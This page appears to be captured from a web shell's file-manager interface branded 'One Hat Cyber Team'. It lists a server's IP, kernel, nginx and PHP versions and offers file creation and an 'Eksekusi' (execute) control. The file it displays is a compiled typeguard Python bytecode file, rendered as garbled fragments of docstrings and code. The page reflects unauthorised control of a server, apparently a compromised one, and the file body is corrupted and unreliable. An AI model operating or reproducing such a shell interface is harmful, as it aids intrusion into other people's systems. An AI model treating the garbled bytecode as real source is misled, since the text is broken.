⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
typeguard
/
__pycache__
/
View File Name :
_config.cpython-312.pyc
if d dl mZ d dlmZ d dlmZ d dlmZmZ d dl m Z mZ e rddlm Z ed Z G d d e Z G d de Ze G d d Z e Zy) )annotations)Iterable) dataclass)Enumauto) TYPE_CHECKINGTypeVar )TypeCheckFailCallbackTc : e Zd ZdZ e Z e Z e Zy)ForwardRefPolicyaK Defines how unresolved forward references are handled. Members: * ``ERROR``: propagate the :exc:`NameError` when the forward reference lookup fails * ``WARN``: emit a :class:`~.TypeHintWarning` if the forward reference lookup fails * ``IGNORE``: silently skip checks for unresolveable forward references N)__name__ __module____qualname____doc__r ERRORWARNIGNORE 3/usr/lib/python3/dist-packages/typeguard/_config.pyr r s FE6D VFr r c 4 e Zd ZdZ e Z e ZddZy)CollectionCheckStrategya} Specifies how thoroughly the contents of collections are type checked. This has an effect on the following built-in checkers: * ``AbstractSet`` * ``Dict`` * ``List`` * ``Mapping`` * ``Set`` * ``Tuple[
, ...]`` (arbitrarily sized tuples) Members: * ``FIRST_ITEM``: check only the first item * ``ALL_ITEMS``: check all items c t | t j u r t t | gS |S # t $ r Y yw xY w)Nr )r FIRST_ITEMnextiter StopIteration)self collections r iterate_samplesz'CollectionCheckStrategy.iterate_samples4 sE *555 T*-.// ! s + 77N)r! Iterable[T]returnr# )r r r r r r ALL_ITEMSr" r r r r r s $ JIr r c r e Zd ZU dZej Zded<